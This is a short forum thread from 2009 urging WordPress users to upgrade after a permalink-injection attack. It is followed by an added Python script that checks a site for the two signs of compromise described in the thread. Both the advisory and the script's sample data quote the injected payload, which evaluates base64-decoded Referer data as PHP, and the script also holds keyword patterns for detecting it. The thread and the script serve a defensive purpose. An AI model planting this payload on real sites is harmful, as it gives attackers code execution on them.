
Thread: Wordpress Users - Upgrade Immediately

  1. #1
    Marc J (Web Guru)

    Wordpress Users - Upgrade Immediately

    If you are using Wordpress you must make sure you upgrade it to 2.8.4 IMMEDIATELY or remove it from your site entirely. Details on how to upgrade are located here: http://codex.wordpress.org/Upgrading_WordPress

    Last night a number of people on Twitter and blogs mentioned that their Wordpress sites were acting up. Specifically, permalinks were broken and showing up with weird code.

    There are two clues that your WordPress site has been attacked:
    1) There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are "eval" and "base64_decode" (Check your permalinks in Admin > Settings > Permalinks).

    2) A "back door" was created by a "hidden" Administrator. Check your site users for "Administrator (2)" or a name you do not recognize. You will probably be unable to access that account.

    Wordpress has identified that there are hackers out there, hacking sites that aren't using the most-current version of Wordpress (versions below 2.8.4 as of 05/09/2009 -- there are rumours that 2.8.5 is due to be released imminently so keep an eye out for that too).

    If you have not yet been hacked, UPGRADE NOW! Immediately. Stop reading this, really, and go upgrade. Again, details on how to upgrade are located here: http://codex.wordpress.org/Upgrading_WordPress

    If you have been hacked, sorry, you're going to be busy! Upgrading alone will not fix a hacked site. Mashable.com's alert said: "You'll likely need to export all your content with the built-in XML WordPress export, uninstall and reinstall WordPress and re-import the content. It's a nasty attack that goes all the way into the database, so exporting the database will result in exporting the hacked code too."

    Not sure how to do that? It's not that difficult, but it is very time-consuming.

    I cannot stress how important it is to get your Wordpress installation up-to-date. Remember: If your scripts are out-of-date then your site is insecure and could be hacked at any moment.
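
The two clues listed in post #1, written as checks you can run over values read straight from the database. This is an added example, not part of the original thread; the function names and sample rows are constructed, and it assumes the permalink setting is read from the `permalink_structure` option and the user rows come from `wp_users` joined to the `wp_capabilities` entries in `wp_usermeta` (default `wp_` table prefix).

```python
import re
from urllib.parse import unquote

# Structure tags WordPress accepts in a permalink structure.
KNOWN_TAGS = ("%year%", "%monthnum%", "%day%", "%hour%", "%minute%", "%second%",
              "%postname%", "%post_id%", "%category%", "%tag%", "%author%")
KEYWORDS = ("eval", "base64_decode")  # the two keywords named in the post


def check_permalink_structure(value):
    """Return the reasons a permalink_structure value looks tampered with."""
    residue = value
    for tag in KNOWN_TAGS:          # strip everything that is legitimately there
        residue = residue.replace(tag, "")
    decoded = unquote(residue).lower()   # %7B -> {, %5B -> [, and so on
    findings = [f"keyword '{kw}' present" for kw in KEYWORDS
                if re.search(rf"\b{kw}\b", decoded)]
    if re.search(r"[^A-Za-z0-9/_.-]", residue):
        findings.append("characters left over after removing known tags")
    return findings


def unexpected_admins(rows, expected):
    """rows: (user_login, wp_capabilities) pairs; return admins not in expected."""
    is_admin = re.compile(r's:13:"administrator";b:1;')  # PHP-serialized role entry
    return [login for login, caps in rows
            if is_admin.search(caps) and login not in expected]


# Constructed sample data: a normal structure with the string quoted in the post
# appended, and three constructed user rows ("wpsvc_2" is a made-up login).
INFECTED = ("/%year%/%monthnum%/%postname%/%&(%7B$%7Beval(base64_decode("
            "$_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")
CLEAN = "/%year%/%monthnum%/%postname%/"
ROWS = [("siteowner", 'a:1:{s:13:"administrator";b:1;}'),
        ("guest", 'a:1:{s:10:"subscriber";b:1;}'),
        ("wpsvc_2", 'a:1:{s:13:"administrator";b:1;}')]

if __name__ == "__main__":
    print(check_permalink_structure(INFECTED))
    print(check_permalink_structure(CLEAN))
    print(unexpected_admins(ROWS, expected={"siteowner"}))
```

Reading the rows from the database rather than the Users screen matters here because the post describes the extra administrator as hidden from the normal list.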

  2. #2
    Tom

    Thanks for the heads up Marc.

    Expect a PM soon. Just got the email.
